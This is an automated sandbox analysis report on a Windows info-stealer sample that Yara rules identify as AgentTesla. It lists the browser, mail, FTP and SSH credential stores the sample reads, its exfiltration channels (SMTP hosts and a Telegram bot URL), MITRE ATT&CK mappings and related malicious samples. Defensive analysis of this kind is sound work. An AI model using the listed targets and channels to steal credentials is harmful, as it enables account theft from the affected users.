Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Code function: 0_2_004703B0 GetSystemTime,ExitProcess,6D8725A0,

0_2_004703B0

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Code function: 0_2_00444250 GetVersion,

0_2_00444250

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000000.00000002.680903753.000000000267B000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.680869571.0000000002632000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.946404123.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.679937947.000000000044B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.946830924.0000000000792000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.680813500.00000000025E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.947178259.0000000000B22000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.946449899.000000000044B000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.946663757.0000000000630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.948310266.0000000002BC2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mcsrXx9lfD.exe PID: 7076, type: MEMORY
Source: Yara match	File source: Process Memory Space: mcsrXx9lfD.exe PID: 7100, type: MEMORY
Source: Yara match	File source: 1.2.mcsrXx9lfD.exe.b20000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mcsrXx9lfD.exe.630000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mcsrXx9lfD.exe.630000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.mcsrXx9lfD.exe.25e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.mcsrXx9lfD.exe.25e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.mcsrXx9lfD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.mcsrXx9lfD.exe.2630000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mcsrXx9lfD.exe.790000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mcsrXx9lfD.exe.400000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: Yara match	File source: 00000001.00000002.948044914.00000000029B5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mcsrXx9lfD.exe PID: 7100, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000000.00000002.680903753.000000000267B000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.680869571.0000000002632000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.946404123.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.679937947.000000000044B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.946830924.0000000000792000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.680813500.00000000025E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.947178259.0000000000B22000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.946449899.000000000044B000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.946663757.0000000000630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.948310266.0000000002BC2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mcsrXx9lfD.exe PID: 7076, type: MEMORY
Source: Yara match	File source: Process Memory Space: mcsrXx9lfD.exe PID: 7100, type: MEMORY
Source: Yara match	File source: 1.2.mcsrXx9lfD.exe.b20000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mcsrXx9lfD.exe.630000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mcsrXx9lfD.exe.630000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.mcsrXx9lfD.exe.25e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.mcsrXx9lfD.exe.25e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.mcsrXx9lfD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.mcsrXx9lfD.exe.2630000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mcsrXx9lfD.exe.790000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mcsrXx9lfD.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	OS Credential Dumping2	System Time Discovery11	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	Input Capture21	File and Directory Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection112	Obfuscated Files or Information2	Credentials in Registry1	System Information Discovery128	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing21	NTDS	Query Registry1	Distributed Component Object Model	Input Capture21	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Security Software Discovery251	SSH	Clipboard Data3	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Virtualization/Sandbox Evasion14	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion14	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection112	Proc Filesystem	Application Window Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	System Network Configuration Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
mcsrXx9lfD.exe	61%	Virustotal		Browse
mcsrXx9lfD.exe	79%	ReversingLabs	Win32.Trojan.LokiBot
mcsrXx9lfD.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.mcsrXx9lfD.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1138205	Download File
0.2.mcsrXx9lfD.exe.25e0000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.1.mcsrXx9lfD.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8	Download File
0.2.mcsrXx9lfD.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1131223	Download File
0.2.mcsrXx9lfD.exe.2630000.3.unpack	100%	Avira	HEUR/AGEN.1138205	Download File
1.2.mcsrXx9lfD.exe.790000.2.unpack	100%	Avira	HEUR/AGEN.1138205	Download File
1.2.mcsrXx9lfD.exe.b20000.4.unpack	100%	Avira	TR/Spy.Gen8	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://smtp.tzdieep.net	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://QBfyHm.com	0%	Avira URL Cloud	safe
http://Gwd19zMdFbudWhUhS.net	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://api.ipify.orgGETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.orgGETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.orgGETMozilla/5.0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
elb097307-934924932.us-east-1.elb.amazonaws.com	54.235.83.248	true	false	high
us2.smtp.mailhostbox.com	208.91.199.225	true	false	high
smtp.tzdieep.net	unknown	unknown	true	unknown
api.ipify.org	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	mcsrXx9lfD.exe, 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp	false		high
http://127.0.0.1:HTTP/1.1	mcsrXx9lfD.exe, 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://api.ipify.org	mcsrXx9lfD.exe, 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp	false		high
http://DynDns.comDynDNS	mcsrXx9lfD.exe, 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://smtp.tzdieep.net	mcsrXx9lfD.exe, 00000001.00000002.948356194.0000000002C0D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://us2.smtp.mailhostbox.com	mcsrXx9lfD.exe, 00000001.00000002.948356194.0000000002C0D000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	mcsrXx9lfD.exe, 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.telegram.org/bot%telegramapi%/	mcsrXx9lfD.exe, 00000000.00000002.680903753.000000000267B000.00000040.00000001.sdmp, mcsrXx9lfD.exe, 00000001.00000002.946404123.0000000000402000.00000040.00000001.sdmp	false		high
http://QBfyHm.com	mcsrXx9lfD.exe, 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	mcsrXx9lfD.exe, 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp	false		high
https://secure.comodo.com/CPS0	mcsrXx9lfD.exe, 00000001.00000003.902505301.00000000008EF000.00000004.00000001.sdmp	false		high
http://Gwd19zMdFbudWhUhS.net	mcsrXx9lfD.exe, 00000001.00000002.948044914.00000000029B5000.00000004.00000001.sdmp, mcsrXx9lfD.exe, 00000001.00000002.948310266.0000000002BC2000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x	mcsrXx9lfD.exe, 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	mcsrXx9lfD.exe	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.ipify.orgGETMozilla/5.0	mcsrXx9lfD.exe, 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
54.235.83.248	unknown	United States		14618	AMAZON-AESUS	false
208.91.199.225	unknown	United States		394695	PUBLIC-DOMAIN-REGISTRYUS	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	321297
Start date:	20.11.2020
Start time:	20:03:26
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	mcsrXx9lfD.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@4/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 15.4% (good quality ratio 15.1%) Quality average: 80.2% Quality standard deviation: 22.1%
HCA Information:	Successful, ratio: 88% Number of executed functions: 118 Number of non-executed functions: 145
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 104.43.139.144, 13.88.21.125, 168.61.161.212, 51.104.139.180, 52.155.217.156, 20.54.26.129, 51.132.208.181, 92.122.213.194, 92.122.213.247 Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus15.cloudapp.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:04:42	API Interceptor	863x Sleep call for process: mcsrXx9lfD.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54.235.83.248	BUILDING ORDER_PROPERTY SPECS.exe	Get hash	malicious	Browse	api.ipify.org/
	OOLU2115890120.xls.exe	Get hash	malicious	Browse	api.ipify.org/
	OBJEDNAT- SII40513967MM793333.PDF.exe	Get hash	malicious	Browse	api.ipify.org/
	5dj4XCE86M.exe	Get hash	malicious	Browse	api.ipify.org/
	di0xAdpLSs.exe	Get hash	malicious	Browse	api.ipify.org/
	payload.exe	Get hash	malicious	Browse	api.ipify.org/
	TNT_Consignment#Ref08971375.gz.exe	Get hash	malicious	Browse	api.ipify.org/
	Our Purchase Order.exe	Get hash	malicious	Browse	api.ipify.org/
	PO-40, PO-41 & PO-42.exe	Get hash	malicious	Browse	api.ipify.org/
	DHL EXPRESS - AWB Numero 06785388011- CONSEGNA DI SPEDIZIONE ORIGINALE.exe	Get hash	malicious	Browse	api.ipify.org/
	vlc-3.0.3-win64.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	Haruko Industrial Supply Tents.exe	Get hash	malicious	Browse	api.ipify.org/
	VlkInw3QXN.exe	Get hash	malicious	Browse	api.ipify.org/
	8sDk3xbzN5.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	uqJ2lweGkV.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	JdZVwprs2g.exe	Get hash	malicious	Browse	api.ipify.org/
	SA765754789654677898367ORDER.exe	Get hash	malicious	Browse	api.ipify.org/
	p.exe	Get hash	malicious	Browse	api.ipify.org/
	Purchase Order_pdf.exe	Get hash	malicious	Browse	api.ipify.org/
	chibyke09.exe	Get hash	malicious	Browse	api.ipify.org/
208.91.199.225	Shipping Details_PDF.exe	Get hash	malicious	Browse
	Order List.xlsx	Get hash	malicious	Browse
	me4qssWAMQ.exe	Get hash	malicious	Browse
	WireTransfer Copy767.exe	Get hash	malicious	Browse
	INQUIRY ON PRICE LIST.xlsm	Get hash	malicious	Browse
	ptv12s0TtX.exe	Get hash	malicious	Browse
	PO 8276789.exe	Get hash	malicious	Browse
	Shipping Details.exe	Get hash	malicious	Browse
	Payment Reference.exe	Get hash	malicious	Browse
	RFQ HLG 21565 HLG SLB ENI MGS BGCS 3 5 RFQ PROJECT OPEN QUOTE HLG 2140 PSI OCT Rev 0 201.exe	Get hash	malicious	Browse
	zH170byIQo.exe	Get hash	malicious	Browse
	2Y3bYDsJgq.exe	Get hash	malicious	Browse
	6SoZZ8R0y4.exe	Get hash	malicious	Browse
	iKmlkmiQfn.exe	Get hash	malicious	Browse
	FINAL SHIPPING DOCS.exe	Get hash	malicious	Browse
	jyqw5vanyZ.exe	Get hash	malicious	Browse
	sDOgBZ59qb.exe	Get hash	malicious	Browse
	P.O. #HBG00356.doc.exe	Get hash	malicious	Browse
	wnF0nE0YUI.exe	Get hash	malicious	Browse
	AWB-145670003.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
us2.smtp.mailhostbox.com	Bill # 2.xlsx	Get hash	malicious	Browse	208.91.198.143
	PO1.xlsx	Get hash	malicious	Browse	208.91.199.223
	QKLQkaCe9M.exe	Get hash	malicious	Browse	208.91.199.224
	0hgHwEkIWY.exe	Get hash	malicious	Browse	208.91.198.143
	Swift Copy.exe	Get hash	malicious	Browse	208.91.199.224
	Shipping Details_PDF.exe	Get hash	malicious	Browse	208.91.199.225
	RFQ_SMKM19112020.xlsx	Get hash	malicious	Browse	208.91.199.224
	Order List.xlsx	Get hash	malicious	Browse	208.91.199.225
	Shipping doc.pdf.exe	Get hash	malicious	Browse	208.91.198.143
	OrV86zxFWHW1j0f.exe	Get hash	malicious	Browse	208.91.199.224
	XDMBhLJxD1Qf7JW.exe	Get hash	malicious	Browse	208.91.199.224
	me4qssWAMQ.exe	Get hash	malicious	Browse	208.91.199.225
	Vd58qg0dhp.exe	Get hash	malicious	Browse	208.91.199.223
	15egpuWfT3.exe	Get hash	malicious	Browse	208.91.199.224
	Shipping Details.exe	Get hash	malicious	Browse	208.91.198.143
	Wrong Transfer Payment - Chk Clip Copy.exe	Get hash	malicious	Browse	208.91.199.223
	WireTransfer Copy767.exe	Get hash	malicious	Browse	208.91.199.225
	DOH0003675550.pdf.exe	Get hash	malicious	Browse	208.91.199.224
	aviso de remesas_pdf__________________________________________.exe	Get hash	malicious	Browse	208.91.199.224
	Doc.exe	Get hash	malicious	Browse	208.91.199.223
elb097307-934924932.us-east-1.elb.amazonaws.com	SecuriteInfo.com.Trojan.PackedNET.461.20928.exe	Get hash	malicious	Browse	23.21.42.25
	Defender-update-kit-x86x64.exe	Get hash	malicious	Browse	54.225.153.147
	https://largemail.r1.rpost.net/files/7xU97qcFgCvB3Uv1wDC4qvS2ZriLfublohKWA5V3/ln/en-us	Get hash	malicious	Browse	54.225.66.103
	ORDER.exe	Get hash	malicious	Browse	54.235.142.93
	Bill # 2.xlsx	Get hash	malicious	Browse	23.21.42.25
	PO1.xlsx	Get hash	malicious	Browse	174.129.214.20
	a7UZzCVWKO.exe	Get hash	malicious	Browse	54.204.14.42
	QKLQkaCe9M.exe	Get hash	malicious	Browse	50.19.252.36
	sAPuJAvs52.exe	Get hash	malicious	Browse	54.243.161.145
	JlgyVmPWZr.exe	Get hash	malicious	Browse	174.129.214.20
	EIUOzWW2JX.exe	Get hash	malicious	Browse	174.129.214.20
	RVAgYSH2qh.exe	Get hash	malicious	Browse	54.235.142.93
	yCyc4rN0u8.exe	Get hash	malicious	Browse	54.235.83.248
	9cXAnovmQX.exe	Get hash	malicious	Browse	54.225.66.103
	T2HDck1Mmy.exe	Get hash	malicious	Browse	54.235.142.93
	Purchase Order.exe	Get hash	malicious	Browse	54.225.66.103
	Payment Advice Note from 19.11.2020.exe	Get hash	malicious	Browse	23.21.126.66
	phy__1__31629__2649094674__1605642612.exe	Get hash	malicious	Browse	23.21.126.66
	BBVA confirming Aviso de pago Eur5780201120.exe	Get hash	malicious	Browse	54.204.14.42
	Ejgvvuwuu8.exe	Get hash	malicious	Browse	54.225.169.28

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-AESUS	SecuriteInfo.com.Trojan.PackedNET.461.20928.exe	Get hash	malicious	Browse	23.21.42.25
	Defender-update-kit-x86x64.exe	Get hash	malicious	Browse	54.225.153.147
	https://largemail.r1.rpost.net/files/7xU97qcFgCvB3Uv1wDC4qvS2ZriLfublohKWA5V3/ln/en-us	Get hash	malicious	Browse	54.225.66.103
	ORDER.exe	Get hash	malicious	Browse	54.235.142.93
	http://s1022.t.en25.com/e/er?s=1022&lid=2184&elqTrackId=BEDFF87609C7D9DEAD041308DD8FFFB8&lb_email=bkirwer%40farbestfoods.com&elq=b095bd096fb54161953a2cf8316b5d13&elqaid=3115&elqat=1	Get hash	malicious	Browse	52.1.99.77
	Bill # 2.xlsx	Get hash	malicious	Browse	23.21.42.25
	https://ubereats.app.link/cwmLFZfMz5?%243p=a_custom_354088&%24deeplink_path=promo%2Fapply%3FpromoCode%3DRECONFORT7&%24desktop_url=tracking.spectrumemp.com/el?aid=8feeb968-bdd0-11e8-b27f-22000be0a14e&rid=50048635&pid=285843&cid=513&dest=overlordscan.com/cmV0by5tZXR6bGVyQGlzb2x1dGlvbnMuY2g=%23#kkowfocjoyuynaip#	Get hash	malicious	Browse	35.170.181.205
	BANK ACCOUNT INFO!.exe	Get hash	malicious	Browse	107.22.223.163
	PO1.xlsx	Get hash	malicious	Browse	174.129.214.20
	https://rebrand.ly/zkp0y	Get hash	malicious	Browse	54.227.164.140
	AccountStatements.html	Get hash	malicious	Browse	18.209.113.162
	a7UZzCVWKO.exe	Get hash	malicious	Browse	54.204.14.42
	QKLQkaCe9M.exe	Get hash	malicious	Browse	50.19.252.36
	sAPuJAvs52.exe	Get hash	malicious	Browse	54.243.161.145
	JlgyVmPWZr.exe	Get hash	malicious	Browse	174.129.214.20
	EIUOzWW2JX.exe	Get hash	malicious	Browse	174.129.214.20
	RVAgYSH2qh.exe	Get hash	malicious	Browse	54.235.142.93
	yCyc4rN0u8.exe	Get hash	malicious	Browse	54.235.83.248
	9cXAnovmQX.exe	Get hash	malicious	Browse	54.225.66.103
	T2HDck1Mmy.exe	Get hash	malicious	Browse	54.235.142.93
PUBLIC-DOMAIN-REGISTRYUS	fattura.exe	Get hash	malicious	Browse	162.222.226.70
	Pagamento.exe	Get hash	malicious	Browse	162.222.226.70
	PO1.xlsx	Get hash	malicious	Browse	208.91.199.223
	QKLQkaCe9M.exe	Get hash	malicious	Browse	208.91.199.224
	Zahlung.exe	Get hash	malicious	Browse	162.222.226.70
	0hgHwEkIWY.exe	Get hash	malicious	Browse	208.91.198.143
	Swift Copy.exe	Get hash	malicious	Browse	208.91.199.224
	Shipping Details_PDF.exe	Get hash	malicious	Browse	208.91.199.225
	Zahlung.exe	Get hash	malicious	Browse	162.222.226.70
	Lieferadresse.exe	Get hash	malicious	Browse	162.222.226.70
	RFQ_SMKM19112020.xlsx	Get hash	malicious	Browse	208.91.199.224
	Order List.xlsx	Get hash	malicious	Browse	208.91.199.225
	Shipping doc.pdf.exe	Get hash	malicious	Browse	208.91.198.143
	OrV86zxFWHW1j0f.exe	Get hash	malicious	Browse	208.91.199.224
	XDMBhLJxD1Qf7JW.exe	Get hash	malicious	Browse	208.91.199.224
	me4qssWAMQ.exe	Get hash	malicious	Browse	208.91.199.225
	Vd58qg0dhp.exe	Get hash	malicious	Browse	208.91.199.223
	15egpuWfT3.exe	Get hash	malicious	Browse	208.91.199.224
	PO_287104.exe	Get hash	malicious	Browse	208.91.198.225
	Machine drawing.exe	Get hash	malicious	Browse	199.79.63.24

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	SecuriteInfo.com.Trojan.PackedNET.461.20928.exe	Get hash	malicious	Browse	54.235.83.248
	ARjQJiNmBs.exe	Get hash	malicious	Browse	54.235.83.248
	1piS4PBvBp.exe	Get hash	malicious	Browse	54.235.83.248
